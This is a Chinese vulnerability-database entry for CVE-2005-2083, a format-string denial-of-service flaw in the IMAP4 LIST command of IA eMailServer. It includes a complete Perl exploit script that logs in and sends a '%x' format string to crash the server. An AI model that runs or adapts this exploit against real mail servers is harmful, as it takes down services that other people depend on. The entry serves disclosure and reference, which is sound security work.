tnsoft IAeMailServer IMAP4 格式化串漏洞

tnsoft IAeMailServer IMAP4 格式化串漏洞

漏洞ID 1108893 漏洞类型 格式化字符串
发布时间 2005-06-26 更新时间 2005-07-05
图片[1]-tnsoft IAeMailServer IMAP4 格式化串漏洞-安全小百科CVE编号 CVE-2005-2083
图片[2]-tnsoft IAeMailServer IMAP4 格式化串漏洞-安全小百科CNNVD-ID CNNVD-200507-036
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1163
https://www.securityfocus.com/bid/89772
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-036
|漏洞详情
IAeMailServer是一款电子邮件服务器软件。IAeMailServerCorporateEdition5.2.2build1051中的IMAP4村子格式化字符串漏洞。远程攻击者可通过LIST命令,将格式化串作为第二个参数,使程序崩溃,导致系统拒绝服务。
|漏洞EXP
#===== Start IAeMailServer_DOS.pl =====
#
# Usage: IAeMailServer_DOS.pl <ip>
#        IAeMailServer_DOS.pl 127.0.0.1
#
# True North Software, Inc. IA eMailServer Corporate Edition
# Version: 5.2.2. Build: 1051.
#
# Download:
# http://www.tnsoft.com/
#
############################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto    => "TCP"))
{
        print "Attempting to kill IA eMailServer at $ARGV[0]:143...";

        sleep(1);

        print $socket "0000 LOGIN hello motorn";

        sleep(1);

        print $socket "0001 LIST 1 %xrn";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:143n";
}
#===== End IAeMailServer_DOS.pl =====

# milw0rm.com [2005-06-26]
|受影响的产品
Truenorth Software Ia Emailserver Corporate 5.3.4 Buil

Truenorth Software Ia Emailserver Corporate 5.3.3

Truenorth Software Ia Emailserver Corporate 5.3.2

Truenorth Software Ia Emailserver Corporate 5.3.

|参考资料

来源:XF
名称:emailserver-list-dos(21169)
链接:http://xforce.iss.net/xforce/xfdb/21169
来源:SECTRACK
名称:1014301
链接:http://securitytracker.com/alerts/2005/Jun/1014301.html
来源:BUGTRAQ
名称:20050627DenialofServiceVulnerabilityinTrueNorthSoftware,Inc.IAeMailServerCorporateEditionVersion:5.2.2.Build:1051
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111988945819448&w;=2

相关推荐: Hosting Controller Multiple Information Disclosure Vulnerabilities

Hosting Controller Multiple Information Disclosure Vulnerabilities 漏洞ID 1097012 漏洞类型 Design Error 发布时间 2005-03-07 更新时间 2005-03-07 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享